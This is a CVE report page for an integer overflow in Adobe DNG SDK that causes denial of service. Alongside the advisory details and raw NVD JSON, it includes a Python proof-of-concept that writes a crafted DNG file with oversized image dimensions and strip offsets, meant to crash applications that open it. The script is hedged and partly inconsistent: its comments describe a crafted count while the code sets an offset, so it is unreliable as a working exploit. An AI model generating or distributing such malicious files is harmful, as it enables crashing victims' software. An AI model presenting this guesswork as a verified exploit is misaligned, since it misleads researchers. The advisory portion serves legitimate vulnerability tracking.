Security Vulnerability Report
CVE-2025-64894 CVSS 5.5 MEDIUM

CVE-2025-64894

Published: 2025-12-09 18:16:08
Last Modified: 2025-12-10 16:03:13

Description

DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could lead to application denial-of-service. An attacker could exploit this issue to cause the application to crash or become unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:dng_software_development_kit:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe DNG SDK <= 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-64894 PoC - Adobe DNG SDK Integer Overflow
This PoC generates a minimal malicious DNG file to trigger integer overflow.
WARNING: For educational and security research purposes only.
"""
import struct
import os


def create_malicious_dng(output_path):
    """
    Create a minimal DNG file that may trigger integer overflow in DNG SDK.
    The vulnerability exists in how DNG SDK handles certain IFD entries
    with specially crafted values that cause integer overflow during size calculations.
    """
    # TIFF header
    tiff_header = bytearray([
        0x49, 0x49, 0x2A, 0x00,  # Byte order: little-endian
        0x08, 0x00, 0x00, 0x00   # Offset to first IFD
    ])

    # IFD0 structure
    # Number of directory entries
    num_entries = 6
    ifd_entries = bytearray()

    # Entry 1: NewSubFileType (Tag 254) - LONG type
    # Value that could trigger overflow when combined with other calculations
    ifd_entries += struct.pack('<HHII', 254, 4, 1, 0)

    # Entry 2: ImageWidth (Tag 256) - SHORT type
    # Large dimension value
    ifd_entries += struct.pack('<HHII', 256, 3, 1, 0xFFFF)

    # Entry 3: ImageLength (Tag 257) - SHORT type
    # Large dimension value that may cause overflow in row stride calculations
    ifd_entries += struct.pack('<HHII', 257, 3, 1, 0xFFFF)

    # Entry 4: BitsPerSample (Tag 258) - SHORT type
    ifd_entries += struct.pack('<HHII', 258, 3, 3, 0)

    # Entry 5: Compression (Tag 259) - SHORT type
    ifd_entries += struct.pack('<HHII', 259, 3, 1, 1)

    # Entry 6: StripOffsets (Tag 273) - LONG type
    # This entry with specially crafted count could trigger integer overflow
    # when SDK calculates total data size
    large_offset = 0x7FFFFFFF  # Near INT32_MAX - potential overflow trigger
    ifd_entries += struct.pack('<HHII', 273, 4, 1, large_offset)

    # Next IFD offset (0 means no more IFDs)
    next_ifd = struct.pack('<I', 0)

    # Combine all parts
    malicious_dng = tiff_header + struct.pack('<H', num_entries) + ifd_entries + next_ifd

    # Add some padding data to simulate image data
    padding = b'\x00' * 1024
    malicious_dng += padding

    with open(output_path, 'wb') as f:
        f.write(malicious_dng)

    print(f"[+] Malicious DNG file created: {output_path}")
    print(f"[+] File size: {len(malicious_dng)} bytes")
    print(f"[!] This PoC attempts to trigger CVE-2025-64894")
    print(f"[!] The vulnerability is an integer overflow in DNG SDK's size calculations")


if __name__ == "__main__":
    output_file = "CVE-2025-64894_poc.dng"
    create_malicious_dng(output_file)
    print("\n[*] Note: Actual exploitation requires specific conditions")
    print("[*] and may vary based on DNG SDK version and compilation options")

References

https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64894", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:16:07.983", "lastModified": "2025-12-10T16:03:12.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could lead to application denial-of-service. An attacker could exploit this issue to cause the application to crash or become unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dng_software_development_kit:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.0", "matchCriteriaId": "8A37E544-82AE-4E72-BA5D-A8C98061CEF8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}